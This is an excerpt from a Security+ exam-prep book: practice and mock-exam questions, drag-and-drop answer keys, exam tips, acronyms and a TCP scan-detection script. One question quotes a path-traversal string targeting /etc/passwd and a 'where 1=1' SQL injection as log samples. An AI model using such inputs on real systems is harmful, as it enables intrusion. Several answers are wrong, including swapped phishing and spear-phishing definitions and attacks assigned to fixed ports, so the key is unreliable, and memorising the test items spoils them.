
B. It provides much faster disaster recovery

C. It is the best model to use for symmetric encryption

D. It provides availability of your IT systems

  1. You are the system administrator for an Active Directory domain and deal with authentication on a daily basis. Which of the following do you use as an authentication method by entering a PIN instead of a password?

A. Smart card

B. Kerberos

C. WPS

D. TOTP

  1. You are the security administrator for a large multinational corporation and you have a meeting with the CEO about the security posture of the company. He wants you to ensure that the following are carried out effectively:

Which of the following is the best solution to implement? Select all that apply:

A. Robocopy firewall logs to a worm drive

B. Robocopy firewall logs to a RAID 5 volume

C. Implement usage auditing and reviews

D. Carry out permission audits and review every seven days

  1. You are the security administrator for a multinational company, and you know that one of your X509 certificates, used in at least 300 desktop machines, has been compromised. What action are you going to take to protect the company, using the least amount of administrative effort?

A. Email the people involved and ask them to delete the X509 from their desktop immediately

B. Carry out certificate pinning to prevent the CA from being compromised

C. Revoke the root CA X509 so it is added to the CRL

D. Revoke the X509 so it is added to the CRL

  1. You need to install a new wireless access point that should be as secure as possible while still being backward compatible with legacy wireless systems. Which of the following should you use?

A. WPA2 PSK

B. WPA

C. WPA2 CCMP

D. WPA2 TKIP

  1. You are the capacity planning administrator for a large multinational corporation, and you find that Server 1 is running out of disk space and, when you monitor its network card, you see that it is at 100% utilization. Which of the following reasons best describes what is happening?

A. There are hardware errors on the server

B. Unauthorized software is being downloaded

C. Event logs are getting full and slowing down the system

D. The disks that were selected were too small

  1. You are the security administrator and someone has just tried to attack your web server, which is protected by a web application firewall. When you look into the log files of the web application firewall, two of the rows of the log file have the following two entries:

var data = "<blackbeard> ++ </../etc/passwd>"

Select* from customers where 1=1

Which of the following attacks are most likely to have been attempted? Select all that apply:

A. Integer overflow

B. SQL injection

C. JavaScript

D. Buffer overflow

  1. Data has been classified as internal data and external data. The company recently added two new classifications of data, legal and financial. What would be the benefit of these new classifications? Select the best solution for the new data classifications:

A. You need a minimum of three classifications for it to be effective

B. Better data classification

C. Quicker indexing

D. Faster searching

  1. You are the security administrator for a multinational corporation based in Miami, and your company has recently suffered a replay attack. After learning the lessons from the attack, you have decided to use a protocol that uses time stamps and USN to prevent replay attacks. Which of the following protocols is being implemented here? Select the best answer:

A. Federation services

B. EAP-TLS

C. Kerberos

D. RADIUS federation

  1. Which of the following threat actors would be the most likely to steal a company's research and development data?

A. Organised crime

B. Competitor

C. Script kiddie

D. Nation state

  1. You are a security administrator for a large multinational corporation based in the United Kingdom. You have just attended an annual seminar about the various types of password attacks. You have already disabled NTLM on all of the servers to prevent pass-the-hash attacks. Which of the following statements involve the storing of passwords as a hash value?

A. A collision attack—the hash value and the data match

B. A collision attack—the hash values match

C. A rainbow-table attack performs a search of simple passwords

D. A rainbow-table attack performs a search of precomputed hashes

  1. You are the new IT director of a small, family-owned business that is rapidly expanding. You have submitted your annual budget for the IT team and the owners of the company want to know why you have asked for funds for vendor diversity. They have asked you to provide two good reasons as to why they should grant you the funds. Which of the following are the most suitable reasons why you wish to implement vendor diversity?

A. Reliability

B. Regulatory compliance

C. It is a best practice in your industry

D. Resiliency

  1. You are the network administrator for a large multinational corporation where you have captured packets that show that the traffic between the company's network devices is in clear text. Which of the following protocols could be used to secure the traffic between the company's network devices? Select all that apply:

A. SNMP V 3

B. SNMP

C. SCP

D. SFTP

  1. You are the auditor of a large multinational corporation and the SIEM server has been finding vulnerabilities on a server. Manual inspection proves that it has been fully hardened and has no vulnerabilities. What are the two main reasons why the SIEM server is producing this output?

A. There was a zero-day virus

B. False negatives

C. False positives

D. The wrong filter was used to audit

  1. You are a forensic investigator who has been called out to deal with a virus attack. You collect the information from the network card and volatile memory. After gathering, documenting, and securing the evidence of a virus attack, what is the best method to prevent further losses to the company?

A. Send a copy of the virus to the lab for analysis

B. Mitigate the attack and get the system back up and running

C. Initiate a chain of custody

D. Initiate business-impact analysis

  1. You are the purchasing manager for a very large multinational company, and you are looking at the company's policy dealing with the insurance of laptops. Last year, the company lost a record number of laptops. Your company is losing 10 laptops per month and the monthly insurance cost is $10,000. Which of the following laptop purchases would prevent you from purchasing insurance?

A. A budget laptop at $1,300 each

B. A budget laptop at $1,200 each

C. A budget laptop at $1,000 each

D. A budget laptop at $1,001 each

  1. Your company has suffered a system-sprawl attack, and you need to be able to identify what has caused the attack, and what the symptoms of the attack are. Which of the following attacks could cause system sprawl and what would be a tell-tale sign of it? Select the best two answers; each is a part of the solution:

A. SQL injection

B. DoS attack

C. CPU at 100% utilization

D. Buffer overflow

  1. Which of the following is a measure of reliability?

A. MTTR

B. MTBF

C. MTTF

D. RPO

  1. Which of the following are the characteristics of a third-party to third-party authentication protocol that uses XML based authentication? Select the best three answers:

A. Single sign on (SSO)

B. Kerberos

C. SAML

D. Federation services

Preparing for the CompTIA Security+ 501 Exam

This guide is to help students pass the Security+ exam first time. More resources, such as flashcards, virtual machines, and PowerPoint slides will be available at www.ianneil501.com.

The CompTIA Security+ 501 exam is a very tricky exam and the only way to pass it is by having a solid knowledge base and good analytical thinking.

The exam is 83 questions in 90 minutes and the pass mark is 750/900, which equates to 83.33%. I think you can get maybe 12-13 questions wrong, but nobody knows how the exam is scored as passes scored in the 750s are even, and 760, 770, 780 seem to be odd and don't increase in the same increments.

The exam will start with simulations that are graphics where you will drag and drop in the answers, usually with four or five different sections. I believe that you get partial points for dragging in a correct answer. To get a look and feel of what a simulation looks like, google Security+ 401 exam simulations under images and many will appear. This will give you an idea of what to expect, but these simulations will be very different as 501 is a different exam.

This book is designed with open questions at the end of each chapter since you need to know the material thoroughly to obtain certification. If we had used multiple choice all of the way through and you were good at guessing, you may have a false impression of your knowledge base. I will give you tips for the exam, followed by additional exam preparation material, including drag and drop practical exercises to help you tackle a simulation type of question, followed with some useful Linux commands.

Tips on taking the exam

When taking the exam, you need to read the question thoroughly and look at the grammar of the question, especially if you are a native English speaker, as we tend to scan, and your answer must meet the objective of the question. Adopt a subtractive method by first ruling out the answers that are wrong and then selecting the correct answer; the hard way to tackle this exam is to immediately pick the right answer.

When you start the exam, the simulations will come first. If you are finding them tricky, go to the top right-hand corner and there will be a button saying something like flag for review, but do NOT attempt to answer it. Do this with any question you find difficult, no matter how large or small it is. When you have finished the 83rd question, it will automatically take you to the review screen. Don't waste time working out a difficult question; mark it up, bank your points, and then give yourself a chance when you are less pressured.

The review screen is larger than the display screen, therefore go to the top of the left-hand column and work your way down that column, then move onto the middle column and the right-hand column.

If you have not answered the review question, there will be a string in red saying something like you need to answer this question, making them very easy to spot. If you have answered the question, the review question will be a different color of blue than the questions that have been answered; this can be tricky if you are color blind. When it asks you if you are finished with the review, scroll up to the top where you should see 0/83 questions. If it says 2/83, then this means that you have not answered two questions. If you cannot answer a question correctly, give it your best shot since there is no penalty for putting in a wrong answer; you never know, you may guess correctly.

When you finish the exam, don't worry as it will go into a few screens where you answer questions based on your profile. However, when it thanks you and you press next, that is the heart attack job, as your score appears on the screen. In the middle of the screen, you will see a Security+ logo; look directly below it and look for the word congratulations—this is all you need to see. Anything else is a bonus.

Exam preparation

An exam preparation guide with a checklist, drag and drop questions, and Linux commands is given here. Follow the checklist to ensure that you are the best prepared that you can be:

Security+—Checklist

Ensure you hit the mark before testing

Task to complete

Date completed

Read Chapter 1, Understanding Security Fundamentals, and score 100% on review questions


Read Chapter 2, Conducting Risk Analysis, and score 100% on review questions


Read Chapter 3, Implementing Security Policies and Procedures, and score 100% on review questions


Read Chapter 4, Delving into Identity and Access Management, and score 100% on review questions


Read Chapter 5, Understanding Network Components, and score 100% on review questions


Read Chapter 6, Understanding Cloud Models and Virtualization, and score 100% on review questions


Read Chapter 7, Managing Hosts and Applications Deployment, and score 100% on review questions


Read Chapter 8, Protecting Against Attacks and Vulnerabilities, and score 100% on review questions


Read Chapter 9, Implementing Public Key Infrastructure, and score 100% on review questions


Read Chapter 10, Responding to Security Incidents, and score 100% on review questions


Read Chapter 11, Managing Business Continuity, and score 100% on review questions


Score 100% on mock exam 1


Score 100% on mock exam 2


Score 100% on drag and drop—attacks


Score 100% on drag and drop—certificates


Score 100% on drag and drop—ports/protocols


Score 100% on drag and drop—authentication


Score 100% on drag and drop—general


Read and understand Linux commands


Read all exam tips in the book



Practical 1—drag and drop—attacks

Please place the answers against the description:

Session hijacking—familiarity—whaling—DDoS—smurf—pharming—phishing—zero day virus—tailgating—virus—replay attack—vishing—spear phishing—worm—man in the middle—social engineering, urgency—XSS—ransomware—ransomware—remote access Trojan—logic bomb—christmas tree attack—pass the hash—Bluejacking

Practical 1—drag and drop—attacks

Put the correct answer against each item

Target the CEO only


Directed IP broadcast to the border router


Holding the door open for someone else


Attack using port 5000


Interception attack in real time


Interception attack, one day delay


Stealing someone's cookie


Leaving a voicemail for the CEO


Letting a fireman into your server room


Redirected to a fraudulent website


Email to a group of people to get bank details


Email to one person to get bank details


Letting someone you know access a secure area


Forcing someone to pay to recover their data


Send login details back to an attacker


An attack using port 445


Triggered by an event or action


Set the PSH, FIN, and URG all to 1


Attack using port 1900


An attack that NTLM is vulnerable to


A host flooded by multiple SYN flood attacks


An attack using HTML tags and JavaScript


Taking control of someone's phone


An attack for which there is no fix


Practical 2—drag and drop—certificates

Please place the answers against the description:

SAN—HSM—exchange keys—Wildcard—CSR—Bridge Trust Model—CRL—pinning—OCSP—PGP—Base64 format—Diffie-Hellman—P12—public CA—OID—key escrow—P7B—certificate template—.pfx—The faster it is but the less secure—.cer—CA—architect—stapling

Practical 2—drag and drop—certificates

Put the correct answer against each item

The CA used for b2b


Certificate used on multiple servers one domain


Private key file extension


Is my certificate valid


First part of encryption


Public key file format


Certificate used on servers in multiple domains


Who signs the X509 certificates


Create new keys


CRL is going slow, so we implement what?


Private key format


Prevent CA compromise


X509 serial number


Stores private keys


PKI to PKI trust


PEM


Creates a secure tunnel


Stores the keys for the key escrow


Public key file format


He builds the CA and/or intermediary


Web server bypassing CRL to go to OCSP


Where is the X509 issuance policy held


What uses a web of trust


The smaller the key...




Practical 3—drag and drop—ports/protocols

Please place the answers against the description:

636—21—443—389—UDP 161—22—5060—53—989/990—5000—3389—UDP 162—1900—22—443—137-139—993—445—23—110—142—80—25—995

Practical 3—drag and drop—ports/protocols

Put the correct answer against each item

Lightweight Directory Access Protocol (LDAP)


Domain Naming System (DNS)


Remote Desktop Protocol (RDP)


Simple network management protocol


Secure copy protocol


Lightweight Directory Access Protocol Secure (LDAPS)


File transfer protocol—passive


FTPS


Simple network management protocol—secure


Secure shell


Telnet


IMAP 4


POP 3 secure


Simple Mail Transfer Protocol (SMTP)


SIP


Worm


IMAP 4 secure


Virus


Ransomware


NETBIOS


TLS


HTTP


POP 3


HTTPS


Practical 4—drag and drop—authentication factors

Please place the answers against the description:

Palm reader—federation services—PIN—Gait—PSK—password—London—WPS—fingerprint—natural signature—smart card—birth date—Kerberos—token—retina—swipe—Iris—federation services

Practical 4—drag and drop—authentication factors

Put the correct answer against each item

Somewhere you are


Third-party to third-party authentication


SAML—XML-based authentication


Something you are


Something you are


Something you are


Something you are


Something you know


Something you know


Something you know


Something you do


Something you do


Something you do


Prevents replay attacks


Wireless router password


Wireless—no password


Something you have


Something you have




Practical 5—drag and drop—general

Please place the answers against the description:

Stored procedure—SSO—disable account, reset password—screen locks—symmetric encryption—cable locks—2—office—standard naming convention—Geotracking—protocol analyzer—banner grabbing—proximity card—on-boarding—3—group policy—input validation—double—single—strong passwords—cable locks—office—passwords—RFID—2—4

Practical 5—drag and drop—general

Put the correct answer against each item

Capture a command on a network


Where you keep a safe


Authentication—provides most errors


Web server information


Identify type of computer in a report


Prevents SQL injection


Prevents SQL injection


RAID 0—minimum disks


Where you keep keys


Configures multiple settings on computers


RAID 6—parity


Policy used for BYOD commencing


Kerberos authentication


Prevents laptops being stolen


Authentication for an office


RAID 5—minimum disks


Encrypts large amounts of data


RAID 5—parity


Finds a mobile device


Person leaves—what do you do with the account?


Prevents stealing a device from a ship


Makes mobile device secure


RAID 1—number of disks

2

Prevents tablet being stolen


Makes mobile device secure


RAID 6—minimum disks




Drag and drop—answers

Practical 1—drag and drop—attacks—answer

Put the correct answer against each item

Target the CEO only

Whaling

Directed IP broadcast to the border router

Smurf

Holding the door open for someone else

Tailgating

Attack using port 5000

Worm

Interception attack in real time

Man in the Middle

Interception attack, one day delay

Replay attack

Stealing someone's cookie

Session Hijacking

Leaving a voicemail for the CEO

Vishing

Letting a fireman into your server room

Social Engineering—Urgency

Redirected to a fraudulent website

Pharming

Email to a group of people to get bank details

Spear Phishing

Email to one person to get bank details

Phishing

Letting someone you know access a secure area

Familiarity

Forcing someone to pay to recover their data

Ransomware

Send login details back to an attacker

Remote Access Trojan

An attack using port 445

Ransomware

Triggered by an event or action

Logic Bomb

Set the PSH, FIN, and URG all to 1

Christmas Tree Attack

Attack using port 1900

Virus

An attack that NTLM is vulnerable to

Pass the Hash

A host flooded by multiple SYN flood attacks

DDoS

An attack using HTML tags and JavaScript

XSS

Sending unsolicited messages to someone's phone over Bluetooth

Bluejacking (taking control of the phone over Bluetooth is bluebugging; copying its data is bluesnarfing)

An attack for which there is no fix

Zero-day exploit
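
The Christmas tree item above is easier to remember once you have looked at where the flags live in a TCP header. The following is an added example, not code from the book: it builds a few 20-byte TCP headers inline (constructed sample packets), reads the flag bits from bytes 12-13, and classifies the packet the way a NIDS rule would. The port numbers are arbitrary.

```python
"""Detecting Christmas-tree (PSH+URG+FIN) and other scan signatures from raw TCP headers.

Added example, not the book's code. The headers are constructed inline so the
script runs offline; in practice you would feed it the TCP layer of a capture.
"""
import struct

# Flag bits in the low byte of the offset/flags word (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_tcp_header(sport: int, dport: int, flags: int) -> bytes:
    """Minimal 20-byte TCP header (data offset 5, no options, checksum left as 0)."""
    data_offset = 5 << 12                     # header length in 32-bit words, upper 4 bits
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, data_offset | flags, 65535, 0, 0)


def tcp_flags(tcp_header: bytes) -> int:
    """Return the 9 flag bits (NS..FIN) from bytes 12-13 of the header."""
    offset_flags = struct.unpack("!H", tcp_header[12:14])[0]
    return offset_flags & 0x1FF


def classify_scan(flags: int) -> str:
    """Name the well-known probe patterns; anything else is treated as normal traffic."""
    if flags & (PSH | URG | FIN) == (PSH | URG | FIN) and not flags & (SYN | ACK | RST):
        return "christmas-tree"              # PSH, URG and FIN all lit up
    if flags == 0:
        return "null"                        # no flags at all, also illegal in a real session
    if flags == FIN:
        return "fin"                         # lone FIN without a preceding session
    if flags & SYN and not flags & ACK:
        return "syn"                         # normal connection start, or a SYN scan when flooded
    return "normal"


def scan_report(packets) -> dict:
    """Count each classification over a list of raw TCP headers."""
    counts = {}
    for pkt in packets:
        label = classify_scan(tcp_flags(pkt))
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    sample = [                                # constructed packets, not a real capture
        build_tcp_header(40000, 80, PSH | URG | FIN),
        build_tcp_header(40001, 443, 0),
        build_tcp_header(40002, 22, SYN),
        build_tcp_header(40003, 80, PSH | ACK),
    ]
    print(scan_report(sample))
```

A packet with PSH, URG and FIN set and no SYN or ACK cannot occur in a legitimate session, which is why signature-based detection can flag it without any state tracking.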



Practical 2—drag and drop—certificates—answers 

Put the correct answer against each item

The CA used for b2b

Public CA

Certificate used on multiple servers one domain

Wildcard

Private key file extension

.pfx

Is my certificate valid

CRL

First part of encryption

Exchange keys

Public key file format

.cer

Certificate used on servers in multiple domains

SAN

Who signs the X509 certificates

CA

Create new keys

CSR

CRL going slow, implement what?

OCSP

Private key format

P12

Prevent CA compromise

Pinning

X509 serial number

OID

Stores private keys

Key escrow

PKI to PKI trust

Bridge Trust Model

PEM

Base 64 format

Creates a secure tunnel

Diffie—Hellman

Stores the keys for the key escrow

HSM

Public key file format

P7B

He builds the CA and/or intermediary

Architect

Web server bypassing CRL to go to OCSP

Stapling

Where is the X509 issuance policy held

Certificate Template

What uses a web of trust

PGP

The smaller the key...

The faster but less secure the encryption



Practical 3—drag and drop—ports/protocols—answers

Put the correct answer against each item

Lightweight Directory Access Protocol (LDAP)

389

Domain Naming System (DNS)

53

Remote Desktop Protocol (RDP)

3389

Simple network management protocol

UDP 161

Secure copy protocol

22

Lightweight Directory Access Protocol Secure (LDAPS)

636

File transfer protocol (control channel, active or passive mode)

21

FTPS

989/990

Simple network management protocol—traps (agent to manager)

UDP 162 (SNMPv3, the secure version, still listens on UDP 161)

Secure shell

22

Telnet

23

IMAP 4

143

POP 3 secure

995

Simple Mail Transfer Protocol (SMTP)

smtp 25

SIP

5060 (SIP over TLS, SIPS, uses 5061)

Worm

5000

IMAP 4 secure

993

Virus

1900

Ransomware

445

NETBIOS

137-139

TLS

443

HTTP

80

POP 3

110

HTTPS

443

Practical 4—drag and drop—authentication factors—answers

Put the correct answer against each item

Somewhere you are

London

Third-party to third-party authentication

Federation services

SAML—XML-based authentication

Federation services

Something you are

Palm reader

Something you are

Retina

Something you are

Iris

Something you know

Password

Something you know

PIN

Something you know

Birth Date

Something you do

Swipe

Something you do

Natural signature

Something you do

Gait

Prevents replay attacks

Kerberos

Wireless router password

PSK

Wireless—no password

WPS

Something you have

Token

Something you have

Smart Card

Practical 5—drag and drop—general—answers

Put the correct answer against each item

Capture the command on a network

Protocol analyzer

Where you keep a safe

Office

Authentication—provides most errors

Passwords

Web server information

Banner grabbing

Identity type of computer in a report

Standard naming convention

Prevent SQL injection

Input validation

Prevent SQL injection

Stored procedure

RAID 0—minimum disks

2

Where you keep keys

Office

Configures multiple settings on computers

Group policy

RAID 6— parity

Double

Policy used for BYOD commencing

Onboarding

Kerberos authentication

SSO

Prevent laptops being stolen

Cable locks

Authentication for an office

Proximity card

RAID 5—minimum disks

3

Encrypts large amount of data

Symmetric encryption

RAID 5—parity

Single

Finds a mobile device

Geolocation

Person leaves—what do you do with the account?

Disable account, reset password

Prevents stealing a device from a shop

RFID

Makes mobile device secure

Strong passwords

RAID 1—number of disks

2

Prevents tablet being stolen

Cable locks

Makes mobile device secure

Screen locks

RAID 6—minimum disks

4



Linux information

Although Linux is not mentioned in the exam syllabus, the Security+ is vendor neutral and the following commands may help you determine what is being asked:

Acronyms

Triple Data Encryption Standard (3DES)

Authentication, Authorization, and Accounting (AAA)

Attribute-based Access Control (ABAC)

Access Control List (ACL)

Advanced Encryption Standard (AES)

Authentication Header (AH)

Annualized Loss Expectancy (ALE)

Access Point (AP)

Application Programming Interface (API)

Advanced Persistent Threat (APT)

Annualized Rate of Occurrence (ARO)

Address Resolution Protocol (ARP)

Acceptable Use Policy (AUP)

Antivirus (AV)

Asset Value (AV)

Business Continuity Planning (BCP)

Business Impact Analysis (BIA)

Business Partners Agreement (BPA)

Bring Your Own Device (BYOD)

Certificate Authority (CA)

Common Access Card (CAC)

Cloud Access Security Broker (CASB)

Cipher Block Chaining (CBC)

Counter Mode with CBC-MAC Protocol (CCMP)

Closed-circuit Television (CCTV)

Certificate (CER)

Cross-over Error Rate (CER)

Challenge Handshake Authentication Protocol (CHAP)

Chief Information Officer (CIO)

Computer Incident Response Team (CIRT)

Content Management System (CMS)

Continuity of Operations Plan (COOP)

Corporate Owned, Personally Enabled (COPE)

Contingency Planning (CP)

Certificate Revocation List (CRL)

Computer Security Incident Response Team (CSIRT)

Chief Security Officer (CSO)

Cloud Service Provider (CSP)

Certificate Signing Request (CSR)

Cross-site Request Forgery (CSRF)

Chief Technology Officer (CTO)

Choose Your Own Device (CYOD)

Discretionary Access Control (DAC)

Distributed Denial of Service (DDoS)

Data Execution Prevention (DEP)

Distinguished Encoding Rules (DER)

Data Encryption Standard (DES)

Dynamic Host Configuration Protocol (DHCP)

Diffie—Hellman (DH)

Diffie—Hellman Ephemeral (DHE)

Dynamic Link Library (DLL)

Data Loss Prevention (DLP)

Demilitarized Zone (DMZ)

Domain Name System (DNS)

Denial of Service (DoS)

Disaster Recovery Plan (DRP)

Extensible Authentication Protocol (EAP)

Electronic Code Book (ECB)

Elliptic Curve Cryptography (ECC)

Elliptic Curve Diffie—Hellman Ephemeral (ECDHE)

Encrypting File System (EFS)

Electromagnetic Interference (EMI)

Electro Magnetic Pulse (EMP)

Encapsulated Security Payload (ESP)

End User License Agreement (EULA)

File System Access Control List (FACL)

False Acceptance Rate (FAR)

Full Disk Encryption (FDE)

False Rejection Rate (FRR)

File Transfer Protocol (FTP)

File Transfer Protocol Secure (FTPS, FTP over TLS)

Galois Counter Mode (GCM)

GNU Privacy Guard (GPG)

Group Policy Object (GPO)

Global Positioning System (GPS)

High Availability (HA)

Hard Disk Drive (HDD)

Host-based Intrusion Detection System (HIDS)

Host-based Intrusion Prevention System (HIPS)

Hash-based Message Authentication Code (HMAC)

HMAC-based One-Time Password (HOTP)

Hardware Security Module (HSM)

Infrastructure as a Service (IaaS)

Internet Control Message Protocol (ICMP)

Intrusion Detection System (IDS)

Institute of Electrical and Electronics Engineers (IEEE)

Internet Information Services (IIS)

Internet Key Exchange (IKE)

Instant Messaging (IM)

Internet Message Access Protocol v4 (IMAP4)

Internet of Things (IoT)

Internet Protocol (IP)

Internet Protocol Security (IPSec)

Incident Response (IR)

Incident Response Plan (IRP)

Interconnection Security Agreement (ISA)

Internet Service Provider (ISP)

Information Systems Security Officer (ISSO)

Initialization Vector (IV)

Layer 2 Tunnelling Protocol (L2TP)

Local Area Network (LAN)

Lightweight Directory Access Protocol (LDAP)

Lightweight Extensible Authentication Protocol (LEAP)

Monitoring as a Service (MaaS)

Mandatory Access Control (MAC)

Media Access Control (MAC)

Master Boot Record (MBR)

Message Digest 5 (MD5)

Mobile Device Management (MDM)

Multifactor Authentication (MFA)

Multi-function Device (MFD)

Multipurpose Internet Mail Extensions (MIME)

Man-in-the-Middle (MITM)

Multimedia Message Service (MMS)

Memorandum of Agreement (MOA)

Memorandum of Understanding (MOU)

Microsoft Challenge Handshake Authentication Protocol (MSCHAP)

Mean Time Between Failures (MTBF)

Mean Time to Failure (MTTF)

Mean Time to Recover or Mean Time to Repair (MTTR)

Network Access Control (NAC)

Network Address Translation (NAT)

Non-disclosure Agreement (NDA)

Near Field Communication (NFC)

Network-based Intrusion Detection System (NIDS)

Network-based Intrusion Prevention System (NIPS)

New Technology File System (NTFS)

New Technology LAN Manager (NTLM)

Network Time Protocol (NTP)

Open Authorization (OAUTH)

Online Certificate Status Protocol (OCSP)

Object Identifier (OID)

Operating System (OS)

Peer to Peer (P2P)

Platform as a Service (PaaS)

Password Authentication Protocol (PAP)

Port Address Translation (PAT)

Password-based Key Derivation Function 2 (PBKDF2)

Protected Extensible Authentication Protocol (PEAP)

Privacy-enhanced Electronic Mail (PEM)

Perfect Forward Secrecy (PFS)

Personal Information Exchange (PFX)

Pretty Good Privacy (PGP)

Personal Health Information (PHI)

Personally Identifiable Information (PII)

Personal Identity Verification (PIV)

Public Key Infrastructure (PKI)

Padding Oracle On Downgraded Legacy Encryption (POODLE)

Post Office Protocol (POP)

Pre-shared Key (PSK)

Recovery Agent (RA)

Registration Authority (RA)

Remote Authentication Dial-In User Service (RADIUS)

Redundant Array of Inexpensive Disks (RAID)

Remote Access Server (RAS)

Remote Access Trojan (RAT)

Role-based Access Control (RBAC)

Rule-based Access Control (RBAC)

Rivest Cipher version 4 (RC4)

Remote Desktop Protocol (RDP)

Representational State Transfer (REST)

Radio Frequency Identification (RFID)

RACE Integrity Primitives Evaluation Message Digest (RIPEMD)

Return on Investment (ROI)

Risk Management Framework (RMF)

Recovery Point Objective (RPO)

Rivest, Shamir, and Adleman (RSA)

Recovery Time Objective (RTO)

Real-time Operating System (RTOS)

Real-time Transport Protocol (RTP)

Secure/Multipurpose Internet Mail Extensions (S/MIME)

Software as a Service (SaaS)

Security Assertion Markup Language (SAML)

Storage Area Network (SAN)

Subject Alternative Name (SAN)

Supervisory Control and Data Acquisition (SCADA)

Security Content Automation Protocol (SCAP)

Simple Certificate Enrollment Protocol (SCEP)

Secure Copy (SCP)

Small Computer System Interface (SCSI)

Software Development Kit (SDK)

Self-Encrypting Drive (SED)

Structured Exception Handler (SEH)

SSH File Transfer Protocol (SFTP)

Secure Hashing Algorithm (SHA)

Security Information and Event Management (SIEM)

Subscriber Identity Module (SIM)

Session Initiation Protocol (SIP)

Session Initiation Protocol Secure (SIPS)

Service Level Agreement (SLA)

Single Loss Expectancy (SLE)

Server Message Block (SMB)

Short Message Service (SMS)

Simple Mail Transfer Protocol (SMTP)

Simple Mail Transfer Protocol Secure (SMTPS)

Simple Network Management Protocol (SNMP)

System on Chip (SoC)

Sender Policy Framework (SPF)

Spam over Internet Messaging (SPIM)

Single Point of Failure (SPoF)

Structured Query Language (SQL)

Secure Real-time Transport Protocol (SRTP)

Solid State Drive (SSD)

Secure Shell (SSH)

Service Set Identifier (SSID)

Secure Sockets Layer (SSL)

Single Sign-on (SSO)

Terminal Access Controller Access Control System Plus (TACACS+)

Transmission Control Protocol/Internet Protocol (TCP/IP)

Ticket Granting Ticket (TGT)

Temporal Key Integrity Protocol (TKIP)

Transport Layer Security (TLS)

Time-based One-time Password (TOTP)

Trusted Platform Module (TPM)

User Acceptance Testing (UAT)

Unmanned Aerial Vehicle (UAV)

User Datagram Protocol (UDP)

Unified Extensible Firmware Interface (UEFI)

Uniform Resource Identifier (URI)

Uniform Resource Locator (URL)

Universal Serial Bus (USB)

USB On-The-Go (USB OTG)

Unified Threat Management (UTM)

Unshielded Twisted Pair (UTP)

Virtual Desktop Environment (VDE)

Virtual Desktop Infrastructure (VDI)

Virtual Local Area Network (VLAN)

Virtual Machine (VM)

Voice over IP (VoIP)

Virtual Private Network (VPN)

Video Teleconferencing (VTC)

Web Application Firewall (WAF)

Wireless Access Point (WAP)

Wired Equivalent Privacy (WEP)

Wireless Intrusion Prevention System (WIPS)

Write Once Read Many (WORM)

Wi-Fi Protected Access (WPA)

Wi-Fi Protected Access 2 (WPA2)

Wi-Fi Protected Setup (WPS)

Exclusive Or (XOR)

Cross-Site Request Forgery (XSRF)

Cross-Site Scripting (XSS)

Assessment

Mock Exam 1

  1. What type of attack is a padding oracle on downgraded legacy encryption attack? Choose two from the following list:

A. IV attack

B. Replay attack

C. Man-in-the-middle attack

D. TLS 1.0 with electronic code book

E. SSL 3.0 with cipher block chaining (CBC)

Answer: C and E

Concept: A POODLE attack is a man-in-the-middle attack in which the attacker forces the browser to downgrade to SSL 3.0 with a CBC cipher and then exploits the padding oracle in that protocol.

  2. You are the security administrator for the British secret service. What type of access method will you use for secret and top-secret data?

A. DAC, with the owner of the data giving access

B. DAC, with the custodian of the data giving access

C. DAC, with the security administrator giving access

D. MAC, with the security administrator giving access

Answer: D

Concept: MAC is used as the access method for classified data and the security administrator is responsible for giving users access to the data once the person has been vetted and access is justified.

  3. Your company wants to protect the integrity of its DNS records by using DNSSEC (which signs records; it does not encrypt DNS traffic). Once you have signed the zone, what records are created for each host?

A. CNAME

B. AAAA

C. RRSIG

D. MX

E. PTR

Answer: C

Concept: Signing a zone adds a DNSKEY record holding the zone's public key and an RRSIG record (a digital signature) for each record set, so resolvers can verify that the answers they receive have not been altered.

Wrong answers:

A. CNAME is an alias

B. AAAA is a host record for IP version 6

D. An MX record is for a mail server

E. PTR records are created in the reverse lookup zone

  4. You are a security administrator and a user called Ben is having a discussion with one of his colleagues. They have four choices for two-factor authentication. They have asked for your advice on which of the following involves two-factor authentication. Select the BEST answer:

A. Smart card

B. Password and PIN

C. Passphrase and username

D. Retina and fingerprint scan

Answer: A

Concept: Two-factor authentication uses factors from two different groups: something you have, something you know, something you are, or somewhere you are. A smart card is something you have, but it needs a PIN, which is something you know.

Wrong answers:

B. Both are something you know

C. Both are something you know

D. Both are something you are

  5. Two separate CAs need to work together on a joint venture; what can they implement so that certificates can be used for cross-certification?

A. Bridge trust model

B. Certificate pinning

C. Certificate stapling

D. Wildcard certificates

Answer: A

Concept: A bridge trust model is used where two root CAs are used to set up cross-certification.

Wrong answers:

B. Pinning ties a host to a known certificate or public key, so a certificate issued by a compromised or rogue CA is rejected

C. Stapling is used by a web server that fetches a signed OCSP response itself and attaches it to the TLS handshake, so the client does not have to download the CRL or query the OCSP responder

D. Wildcard certificates can be used by multiple servers in the same domain

  6. John goes to a sports website and gets the following error:

THIS WEBSITE CANNOT BE TRUSTED.

What two actions does the website administrator need to take to resolve this error?

A. Ask the key escrow to store his private key

B. Ensure that the website uses a valid SAN certificate

C. Update the root certificate into the client computer trusted root certificate authorities store

D. Verify whether the certificate on the server has expired

Answer: C and D

Concept: A certificate needs to be valid and trusted by the computer.

Wrong answers:

A. The key escrow only stores private keys

B. A SAN certificate can be used across multiple domains

  7. A security administrator discovers that an attacker used a compromised host as a platform for launching attacks deeper into a company's network. What terminology BEST describes the use of the compromised host?

A. Brute force

B. Active reconnaissance

C. Pivoting

D. Passing point

Answer: C

Concept: Pivoting involves using a weak host to launch an attack further into the network.

Wrong answers:

A. Brute force is a password attack

B. Active reconnaissance is a penetration-testing technique that probes the target directly (for example, a port scan); it gathers information rather than launching attacks from a host

D. Passing point does not exist; it just sounds good—a red herring

  8. Mary is managing the company's wireless network, which will use WPA2-PSK. What encryption is MOST likely to be used?

A. SHA-1

B. AES

C. MD5

D. DES

Answer: B

Concept: The encryption that WPA2 is most likely to use is AES.

Wrong answers:

A. SHA-1 is used for hashing

C. MD5 is also used for hashing

D. DES is not used by wireless technology

  9. Who is responsible for setting permissions when using a Mandatory Access Control (MAC) model?

A. The owner

B. The manager

C. The administrator

D. The user

Answer: C

Concept: MAC gives access to data based on the file classification (for example, top secret); the security administrator sets permissions.

Wrong answers:

A. Owners can give access using the DAC model, but once a classified document is written, it has no owner, and it is controlled centrally

B. Managers cannot grant any permissions to data

D. A user cannot grant access to any data

